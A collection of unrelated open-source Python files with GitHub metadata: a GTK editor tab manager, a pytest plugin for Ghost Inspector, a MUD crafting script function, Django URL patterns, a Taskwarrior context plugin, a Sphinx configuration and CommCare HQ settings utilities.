def set_line_mark_states(self, file_handle, added, changed, removed):
if not file_handle.exists:
return
if self._tabs_with_files_that_exist.has_key(file_handle.absolute_name):
self._tabs_with_files_that_exist[file_handle.absolute_name].set_line_mark_states(added, changed, removed)
# implementation
###########################################################################
def grab_focus(self):
if self._notebook.get_n_pages():
n = self._notebook.get_current_page()
self._notebook.get_nth_page(n).grab_focus()
def _on_page_added(self, nb, child, page_num):
fh = child.file_handle
if fh.exists:
self._tabs_with_files_that_exist[fh.absolute_name] = child
def _on_page_removed(self, nb, child, page_num):
fh = child.file_handle
if fh.exists:
assert self._tabs_with_files_that_exist.has_key(fh.absolute_name)
del self._tabs_with_files_that_exist[fh.absolute_name]
def _focus_nth_tab(self,num):
print "Focusing %i" % num
if num >= self._notebook.get_n_pages():
return
self._notebook.set_current_page(num)
self._notebook.get_nth_page(num).grab_focus()
def _focus_tab(self,tab):
for i in range(self._notebook.get_n_pages()):
page = self._notebook.get_nth_page(i)
if page == tab:
self._notebook.set_current_page(i)
return
raise Exception("Tab not found: %s")
| {
"content_hash": "c6284b49b814f9f1b84c88fda40074d8",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 133,
"avg_line_length": 37,
"alnum_prop": 0.6495726495726496,
"repo_name": "natduca/ndbg",
"id": "ba5af1b4da2357d05ba1646fe2cff462bfba23ac",
"size": "5009",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ui/source_view_editor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "4728"
},
{
"name": "C++",
"bytes": "5787"
},
{
"name": "Emacs Lisp",
"bytes": "5014"
},
{
"name": "JavaScript",
"bytes": "237"
},
{
"name": "Python",
"bytes": "554374"
},
{
"name": "Shell",
"bytes": "781"
},
{
"name": "VimL",
"bytes": "1848"
}
],
"symlink_target": ""
} |
import yaml
import pytest
import shutil
import requests
import tempfile
from os import getenv as env
from contextlib import contextmanager
API_URL = env('GI_API_URL', 'https://api.ghostinspector.com/v1/')
API_KEY = env('GI_API_KEY')
START_URL = env('GI_START_URL')
# Command-line Options
def pytest_addoption(parser):
group = parser.getgroup('ghostinspector')
group.addoption(
'--gi_key',
action='store',
dest='gi_key',
default=API_KEY,
help='Set the value for the Ghost Inspector API key'
)
group.addoption(
'--gi_start_url',
action='store',
dest='gi_start_url',
default=START_URL,
help='Override the starting url value for the Ghost Inspector tests'
)
group.addoption(
'--gi_suite',
action='append',
dest='gi_suite',
default=[],
help='Id of a Ghost Inspector suite to execute'
)
group.addoption(
'--gi_test',
action='append',
dest='gi_test',
default=[],
help='Id of a Ghost Inspector test to execute'
)
group.addoption(
'--gi_param',
action='append',
dest='gi_param',
default=[],
help=(
'Querystring param (repeatable) to include '
'in the API execute request. Example: "--gi_param foo=bar"'
)
)
group.addoption(
'--gi_collect_mode',
action='store',
dest='gi_collect_mode',
type=str,
choices=['files', 'ids', 'all'],
help=('specifiy "files", "ids" or "all" to control how the plugin '
'manages test collection')
)
def pytest_configure(config):
# only do logic if mode is not explicitly set
if config.option.gi_collect_mode is None:
if config.option.gi_test or config.option.gi_suite:
# this will disable file/directory test discovery
config.option.gi_collect_mode = "ids"
@pytest.hookimpl(hookwrapper=True)
def pytest_collection(session):
"""
Allow execution of suites/tests specified via cmdline opts. Creates temp
yaml files for the discover/collection process.
"""
@contextmanager
def _make_tmp_dir():
tmpdir = tempfile.mkdtemp()
yield tmpdir
shutil.rmtree(tmpdir)
def _make_tmp_yaml(tmpdir, data):
tf = tempfile.NamedTemporaryFile('wt',
prefix='gi_test_',
suffix='.yml',
dir=tmpdir,
delete=False)
yaml.safe_dump(data, tf)
tf.close()
return tf.name
if not session.config.option.gi_suite \
and not session.config.option.gi_test:
yield
elif session.config.option.gi_collect_mode == "files":
yield
else:
with _make_tmp_dir() as tmpdir:
tmp_files = []
for id in session.config.option.gi_suite:
test_yaml = {'suites': [{'id': id}]}
tmp_files.append(_make_tmp_yaml(tmpdir, test_yaml))
for id in session.config.option.gi_test:
test_yaml = {'tests': [{'id': id}]}
tmp_files.append(_make_tmp_yaml(tmpdir, test_yaml))
session.config.args += tmp_files
yield
def pytest_collect_file(path, parent):
"""Collection hook for ghost inspector tests
This looks for yaml files containing configuration info for executing
http://ghostinspector.com tests via the API
"""
if path.basename.startswith('gi_test_') and path.ext == '.yml':
if parent.config.option.gi_key is None:
raise pytest.UsageError("Missing --gi_key option")
return GIYamlCollector(path, parent=parent)
def pytest_ignore_collect(path, config):
"""
Disable file/directory collection when --gi-test/--gi-suite options are
provided
"""
if config.option.gi_collect_mode == "ids":
return True
class GIAPIMixin(object):
def _api_request(self, url, params=None):
if params is None:
params = {}
params['apiKey'] = self.gi_key
if self.config.option.gi_start_url is not None:
params['startUrl'] = self.config.option.gi_start_url
try:
resp = requests.get(url, params=params)
resp.raise_for_status()
resp_data = resp.json()
if 'errorType' in resp_data:
raise self.CollectError(
"Ghost Inspector API returned error: %s" %
resp_data['message'])
return resp_data['data']
except Exception as e:
raise self.CollectError(str(e))
class GIYamlCollector(pytest.File, GIAPIMixin):
"""Collect and generate pytest test items based on yaml config"""
def __init__(self, *args, **kwargs):
super(GIYamlCollector, self).__init__(*args, **kwargs)
self.gi_key = self.config.option.gi_key
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for suite in raw.get('suites', []):
for test_item in self._collect_suite(suite):
yield test_item
for test in raw.get('tests', []):
yield self._collect_test(test)
def _collect_suite(self, suite):
url = API_URL + ('suites/%s/tests/' % suite['id'])
test_list = self._api_request(url)
for test_config in test_list:
yield self._create_test_item(test_config)
def _collect_test(self, test):
url = API_URL + ('tests/%s/' % test['id'])
test_config = self._api_request(url)
return self._create_test_item(test_config)
def _create_test_item(self, test_config):
params = dict(x.split('=') for x in self.config.option.gi_param)
spec = {
'id': test_config['_id'],
'suite': test_config['suite']['name'],
'params': params
}
return GITestItem(test_config['name'], self, spec)
class GITestItem(pytest.Item, GIAPIMixin):
def __init__(self, name, parent, spec):
super(GITestItem, self).__init__(name, parent)
self.gi_key = self.config.option.gi_key
self.spec = spec
def runtest(self):
url = API_URL + ('tests/%s/execute/' % self.spec['id'])
result = self._api_request(url, self.spec['params'])
if not result['passing']:
raise GIException(self, result)
def repr_failure(self, excinfo):
""" format failure info from GI API response """
if isinstance(excinfo.value, GIException):
resp_data = excinfo.value.args[1]
failing_step = next(
step for step in resp_data['steps'] if not step['passing']
)
if 'error' in resp_data:
error_msg = resp_data['error']['details']
else:
error_msg = ''
result_url_base = 'https://app.ghostinspector.com/results'
return "\n".join([
"Ghost Inspector test failed",
" name: %s" % resp_data['test']['name'],
" start url: %s" % resp_data['startUrl'],
" end url: %s" % resp_data['endUrl'],
" result url: %s/%s" % (result_url_base, resp_data['_id']),
" sequence: %d" % failing_step['sequence'],
" target: %s" % failing_step['target'],
" command: %s" % failing_step['command'],
" value: %s" % failing_step['value'],
" error: %s" % error_msg,
" step error: %s" % failing_step.get('error', '')
])
def reportinfo(self):
return self.fspath, 0, "%s :: %s" % (self.spec['suite'], self.name)
class GIException(Exception):
""" custom failure reporting """
| {
"content_hash": "18c8d0a343f2294c740b2adce67b730f",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 77,
"avg_line_length": 32.40573770491803,
"alnum_prop": 0.5512836726950803,
"repo_name": "harvard-dce/pytest-ghostinspector",
"id": "c1766ce130dce176c02688d24f56b007f797d0d5",
"size": "7932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pytest_gi/plugin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13288"
}
],
"symlink_target": ""
} |
"""Fichier contenant la fonction reussir_recette."""
from primaires.format.fonctions import supprimer_accents
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
class ClasseFonction(Fonction):
"""Fait progresser un membre de guilde dans son rang."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.reussir_recette, "Personnage", "str", "str")
@staticmethod
def reussir_recette(personnage, cle_guilde, cle_recette):
"""Fait progresser le personnage dans le rang de la guilde.
La recette est la clé du prototype d'objet d'une recette de
rang. En fonction du nombre nécessaire, le personnage progresse
dans le rang. Si par exemple il doit faire 3 epee_courte,
il progressera les trois premières fois. Après, il ne
progressera plus dans le rang (il aura fait cet objet 3 fois).
Cette action est donc à mettre dans le cas où le personnage
réussit l'objet de rang.
Si la guilde n'est pas trouvée, crée une alerte. En revanche,
si la recette n'est pas trouvée dans le rang, ne lève aucune
alerte et ne fait rien (passe à la ligne suivante du script).
Cette fonction retourne vrai si le personnage a bel et bien
progressé dans son rang, faux sinon. Cela permet de faire
différentes actions en fonction de la progression du
personnage.
Paramètres à préciser :
* personnage : le personnage membre de la guilde
* cle_guilde : la clé de guilde (une chaîne)
* cle_recette : la clé de la recette (une chaîne)
Exemple d'utilisation :
si reussir_recette personnage "forgerons" "epee_courte":
# Le personnage a réussit et progressé
sinon:
# Le personnage a réussit mais n'a pas progressé
"""
cle_guilde = cle_guilde.lower()
if cle_guilde not in importeur.crafting.guildes:
raise ErreurExecution("La guilde {} n'existe pas".format(
repr(cle_guilde)))
guilde = importeur.crafting.guildes[cle_guilde]
if personnage not in guilde.membres:
return False
progression = guilde.membres[personnage]
try:
return progression.reussir_recette(cle_recette.lower())
except ValueError:
return False
| {
"content_hash": "236ca4f68fbc5c9db48adebb9c4fb3fd",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 74,
"avg_line_length": 37.8125,
"alnum_prop": 0.6603305785123967,
"repo_name": "vlegoff/tsunami",
"id": "b7a001b1ca2d5b5bbbcdafc637f01bbc81b1d577",
"size": "4012",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/secondaires/crafting/fonctions/reussir_recette.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7930908"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
urlpatterns = patterns('apps.basic_pages.views',
#url(r'^home/$', 'view_homepage', name="view_homepage"),
url(r'^support/$', 'view_support_page', name="view_support_page"),
url(r'^best-practices/$', 'view_best_practices_page', name="view_best_practices_page"),
#url(r'^/?$', 'view_homepage', name="default_homepage"),
url(r'^/?$', 'view_homepage', name="view_homepage"),
)
| {
"content_hash": "65d1422fef33a90292c30ebcfd1cc097",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 91,
"avg_line_length": 28.3125,
"alnum_prop": 0.6423841059602649,
"repo_name": "bencomp/dataverse.org",
"id": "b6de6975b78d75ecfdb21cc5b77c1a29885f97db",
"size": "453",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dataverse_org/apps/basic_pages/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8915"
},
{
"name": "JavaScript",
"bytes": "818906"
},
{
"name": "Perl",
"bytes": "13686"
},
{
"name": "Python",
"bytes": "140061"
},
{
"name": "Shell",
"bytes": "21004"
}
],
"symlink_target": ""
} |
"""
Package declaration for content assertions test helper module
"""
import core
| {
"content_hash": "306e1611848df9f04cbfa6a6e17eda83",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 61,
"avg_line_length": 20.5,
"alnum_prop": 0.7804878048780488,
"repo_name": "bmedx/modulestore",
"id": "fc6a0c4d9bf0af7946a7ce8fb0231b9eac561c8d",
"size": "82",
"binary": false,
"copies": "94",
"ref": "refs/heads/master",
"path": "xmodule/tests/rendering/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "8102"
},
{
"name": "Makefile",
"bytes": "3554"
},
{
"name": "Python",
"bytes": "1355902"
},
{
"name": "Shell",
"bytes": "132"
}
],
"symlink_target": ""
} |
from taskwarrior_capsules.capsule import CommandCapsule
from taskwarrior_capsules.exceptions import CapsuleError
from taskwarrior_capsules.data import BUILT_IN_COMMANDS
class Context(CommandCapsule):
""" Backports 'context' command Taskwarrior 2.4.2."""
MIN_VERSION = '0.2.5'
MAX_VERSION = '1.0'
MIN_TASKWARRIOR_VERSION = '2.3'
MAX_TASKWARRIOR_VERSION = '2.4.1.99999'
def handle(self, filter_args, extra_args, **kwargs):
try:
first_arg = extra_args[0].lower()
except IndexError:
raise CapsuleError("No context command specified")
if first_arg == 'none':
self.clear_context(extra_args[1:])
elif first_arg == 'delete':
self.delete_context(extra_args[1:])
elif first_arg == 'list':
self.list_contexts(extra_args[1:])
elif first_arg == 'show':
self.show_context(extra_args[1:])
elif first_arg == 'define':
self.define_context(extra_args[1:])
else:
self.set_context(extra_args)
self.configuration.write()
def preprocess(self, filter_args, extra_args, command_name=None, **kwargs):
try:
context = self.configuration['current_context']
is_report = command_name not in BUILT_IN_COMMANDS
if is_report and context:
context_filters = self._get_contexts()[context]
filter_args.append('(%s)' % context_filters)
except KeyError:
pass
return filter_args, extra_args, command_name
# Utility methods
def clear_context(self, args):
self.configuration['current_context'] = ''
def delete_context(self, args):
ctx = self._get_contexts()
context_name = self._collapse(args)
if context_name in ctx:
del ctx[context_name]
else:
raise CapsuleError(
"Context '%s' does not exist" % context_name
)
def list_contexts(self, args):
ctx = self._get_contexts()
for context_name, context in ctx.items():
print '%s\t%s' % (context_name, context)
def show_context(self, args):
print self.configuration.get('current_context', '')
def define_context(self, args):
context_name = args[0]
spec = self._collapse(args[1:])
contexts = self._get_contexts()
contexts[context_name] = spec
self._set_contexts(contexts)
def set_context(self, args):
context_name = self._collapse(args)
if context_name in self._get_contexts():
self.configuration['current_context'] = context_name
else:
raise CapsuleError(
"Context '%s' does not exist" % context_name
)
def _get_contexts(self):
if 'contexts' not in self.configuration:
self.configuration['contexts'] = {}
return self.configuration['contexts']
def _set_contexts(self, ctx):
self.configuration['contexts'] = ctx
def _collapse(self, args):
return ' '.join(args)
| {
"content_hash": "f604819d96b79fcd3ea86cc50356f8dd",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 79,
"avg_line_length": 32.694736842105264,
"alnum_prop": 0.5872504829362524,
"repo_name": "coddingtonbear/taskwarrior-context-capsule",
"id": "6f0c1e9ac55f04c1e4b3d2b5afb4b635562c3cc4",
"size": "3106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "taskwarrior_context_capsule/capsule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5068"
}
],
"symlink_target": ""
} |
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'connect-sdk-python2'
copyright = u'Copyright (c) 2016 Global Collect Services B.V.'
author = u'Ingenico ePayments'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'3.33.0'
# The full version, including alpha/beta/rc tags.
release = u'3.33.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'Python SDK v3.33.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'connect-sdk-python2doc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'connect-sdk-python2.tex', u'connect-sdk-python2 Documentation',
author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'connect-sdk-python2', u'connect-sdk-python2 Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
# texinfo_documents = [
# (master_doc, 'test', u'Python SDK Documentation',
# author, 'test',
# 'SDK to communicate with the Ingenico ePayments platform using the Ingenico Connect Server API',
# 'Miscellaneous'),
# ]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
def filter_members(app, what, name, obj, skip, options):
# include __init__ and __str__ methods that are documented
if name in ('__init__', '__str__') and not skip:
return not bool(obj.__doc__)
# exclude nested classes
if what == 'class' and str(obj)[:7] == '<class ':
return True
# special case
if what == 'module' and name == 'IterProperty':
return True
return skip
def setup(app):
app.connect('autodoc-skip-member', filter_members)
| {
"content_hash": "94da4c32d276f8229bd32cd38cd87433",
"timestamp": "",
"source": "github",
"line_count": 342,
"max_line_length": 103,
"avg_line_length": 28.719298245614034,
"alnum_prop": 0.6842801873345551,
"repo_name": "Ingenico-ePayments/connect-sdk-python2",
"id": "9e994ace69290d47c7b65b0004fdf54814904808",
"size": "10479",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "36"
},
{
"name": "Python",
"bytes": "1733005"
}
],
"symlink_target": ""
} |
import logging
import os
import re
import subprocess
import sys
import tempfile
import uuid
from collections import namedtuple
from django.db.backends.base.creation import TEST_DATABASE_PREFIX
def is_testing():
return os.environ.get("CCHQ_TESTING") == "1"
class SharedDriveConfiguration(object):
def __init__(self, shared_drive_path, restore_dir, transfer_dir, temp_dir, blob_dir):
self.shared_drive_path = shared_drive_path
self.restore_dir_name = restore_dir
self.transfer_dir_name = transfer_dir
self.temp_dir_name = temp_dir
self.blob_dir_name = blob_dir
self._restore_dir = self._init_dir(restore_dir)
self.transfer_dir = self._init_dir(transfer_dir)
self.temp_dir = self._init_dir(temp_dir)
self.blob_dir = self._init_dir(blob_dir)
def _init_dir(self, name):
if not self.shared_drive_path or not os.path.isdir(self.shared_drive_path) or not name:
return None
path = os.path.join(self.shared_drive_path, name)
if not os.path.exists(path):
os.mkdir(path)
elif not os.path.isdir(path):
raise Exception('Shared folder is not a directory: {}'.format(name))
return path
def get_unset_reason(self, name):
if not self.shared_drive_path:
return "invalid shared drive path: %r" % (self.shared_drive_path,)
if not os.path.isdir(self.shared_drive_path):
return "shared drive path is not a directory: %r" % (self.shared_drive_path,)
directory = getattr(self, name + "_name")
if not directory:
return name + " is empty or not configured in settings"
return None
@property
def restore_dir(self):
return self._restore_dir or tempfile.gettempdir()
@property
def transfer_enabled(self):
from django_transfer import is_enabled
return is_enabled() and self.transfer_dir
def get_temp_file(self, suffix="", prefix="tmp"):
name = '{}{}{}'.format(prefix, uuid.uuid4().hex, suffix)
return os.path.join(self.temp_dir, name)
def get_server_url(http_method, server_root, username, password):
if username and password:
return '%(http_method)s://%(user)s:%(pass)s@%(server)s' % {
'http_method': http_method,
'user': username,
'pass': password,
'server': server_root,
}
else:
return '%(http_method)s://%(server)s' % {
'http_method': http_method,
'server': server_root,
}
def get_dynamic_db_settings(server_root, username, password, dbname,
use_https=False):
"""
Get dynamic database settings.
Other apps can use this if they want to change settings
"""
http_method = 'https' if use_https else 'http'
server_url = get_server_url(http_method, server_root, username, password)
database = '%(server)s/%(database)s' % {
'server': server_url,
'database': dbname,
}
return {
'COUCH_SERVER': server_url,
'COUCH_DATABASE': database,
}
def get_db_name(dbname, is_test):
"""Get databse name (possibly with test prefix)
:param is_test: Add test prefix if true.
"""
if isinstance(dbname, bytes):
dbname = dbname.decode('utf-8')
return (TEST_DATABASE_PREFIX + dbname) if is_test else dbname
def assign_test_db_names(dbs):
"""Fix database names for REUSE_DB
Django automatically uses test database names when testing, but
only if the test database setup routine is called. This allows us
to safely skip the test database setup with REUSE_DB.
"""
for db in dbs.values():
test_db_name = get_db_name(db['NAME'], True)
db['NAME'] = db.setdefault('TEST', {}).setdefault('NAME', test_db_name)
class CouchSettingsHelper(namedtuple('CouchSettingsHelper',
['couch_database_configs', 'couchdb_apps', 'extra_db_names', 'unit_testing'])):
def make_couchdb_tuples(self):
"""
Helper function to generate couchdb tuples
for mapping app name to couch database URL.
"""
return [self._make_couchdb_tuple(row) for row in self.couchdb_apps]
def _make_couchdb_tuple(self, row):
if isinstance(row, tuple):
app_label, postfix = row
else:
app_label, postfix = row, None
if postfix:
if postfix in self.db_urls_by_prefix:
url = self.db_urls_by_prefix[postfix]
else:
url = '%s__%s' % (self.main_db_url, postfix)
return app_label, url
else:
return app_label, self.main_db_url
def get_extra_couchdbs(self):
"""
Create a mapping from database prefix to database url
"""
extra_dbs = {}
postfixes = []
for row in self.couchdb_apps:
if isinstance(row, tuple):
_, postfix = row
if postfix:
postfixes.append(postfix)
postfixes.extend(self.extra_db_names)
for postfix in postfixes:
if postfix in self.db_urls_by_prefix:
url = self.db_urls_by_prefix[postfix]
else:
url = '%s__%s' % (self.main_db_url, postfix)
extra_dbs[postfix] = url
return extra_dbs
@property
def main_db_url(self):
return self.db_urls_by_prefix[None]
@property
def db_urls_by_prefix(self):
if not getattr(self, '_urls_by_prefix', None):
urls_by_prefix = {}
for key, config in self.couch_database_configs.items():
prefix = None if key == 'default' else key
url = self._get_db_url(config)
urls_by_prefix[prefix] = url
self._urls_by_prefix = urls_by_prefix
return self._urls_by_prefix
def _get_db_url(self, config):
return get_dynamic_db_settings(
config['COUCH_SERVER_ROOT'],
config['COUCH_USERNAME'],
config['COUCH_PASSWORD'],
get_db_name(config['COUCH_DATABASE_NAME'], self.unit_testing),
use_https=config['COUCH_HTTPS'],
)["COUCH_DATABASE"]
def celery_failure_handler(task, exc, task_id, args, kwargs, einfo):
from django_redis.exceptions import ConnectionInterrupted
from redis.exceptions import ConnectionError
if isinstance(exc, (ConnectionInterrupted, ConnectionError)):
task.retry(args=args, kwargs=kwargs, exc=exc, max_retries=3, countdown=60 * 5)
def get_allowed_websocket_channels(request, channels):
from django.core.exceptions import PermissionDenied
if request.user and request.user.is_authenticated and request.user.is_superuser:
return channels
else:
raise PermissionDenied(
'Not allowed to subscribe or to publish to websockets without '
'superuser permissions or domain membership!'
)
def fix_logger_obfuscation(fix_logger_obfuscation_, logging_config):
if fix_logger_obfuscation_:
# this is here because the logging config cannot import
# corehq.util.log.HqAdminEmailHandler, for example, if there
# is a syntax error in any module imported by corehq/__init__.py
# Setting FIX_LOGGER_ERROR_OBFUSCATION = True in
# localsettings.py will reveal the real error.
# Note that changing this means you will not be able to use/test anything
# related to email logging.
for handler in logging_config["handlers"].values():
if handler["class"].startswith("corehq."):
if fix_logger_obfuscation_ != 'quiet':
print("{} logger is being changed to {}".format(
handler['class'],
'logging.StreamHandler'
), file=sys.stderr)
handler["class"] = "logging.StreamHandler"
def configure_sentry(base_dir, server_env, dsn):
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.logging import ignore_logger
from sentry_sdk.integrations.redis import RedisIntegration
from sentry_sdk.integrations.sqlalchemy import SqlalchemyIntegration
def _before_send(event, hint):
# can't import this during load since settings is not fully configured yet
from corehq.util.sentry import before_sentry_send
return before_sentry_send(event, hint)
release = get_release_name(base_dir, server_env)
ignore_logger('quickcache')
ignore_logger('django.template')
ignore_logger('pillowtop')
ignore_logger('restore')
ignore_logger('kafka.conn')
sentry_sdk.init(
dsn,
release=release,
environment=server_env,
request_bodies='never',
before_send=_before_send,
integrations=[
DjangoIntegration(),
CeleryIntegration(),
SqlalchemyIntegration(),
RedisIntegration()
]
)
def get_release_name(base_dir, server_env):
"""Return the release name. This should match the name of the release
created by commcare-cloud
"""
release_dir = base_dir.split('/')[-1]
if re.match(r'\d{4}-\d{2}-\d{2}_\d{2}.\d{2}', release_dir):
return "{}-{}".format(release_dir, server_env)
else:
return get_git_commit(base_dir) or 'unknown'
def get_git_commit(base_dir):
try:
out = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=base_dir)
return out.strip().decode('ascii')
except OSError:
pass
def update_redis_location_for_tests(settings_caches):
if not is_testing():
raise Exception("Attempt to update Redis settings outside of tests")
for name, config in settings_caches.items():
if not config.get("BACKEND", "").startswith("django_redis"):
continue
test_location = config.get("TEST_LOCATION")
if test_location:
config["LOCATION"] = test_location
else:
logging.warning(
"Unable to set Redis DB in '%(name)s' cache for tests. Using '%(location)s'.\n"
"\tTo configure a separate Redis DB for tests add a 'TEST_LOCATION' to the"
" '%(name)s' cache configuration.", {"name": name, "location": config["LOCATION"]}
)
| {
"content_hash": "1e6afd2941c06fb8faff98ef8269953f",
"timestamp": "",
"source": "github",
"line_count": 305,
"max_line_length": 105,
"avg_line_length": 34.445901639344264,
"alnum_prop": 0.6099371787549971,
"repo_name": "dimagi/commcare-hq",
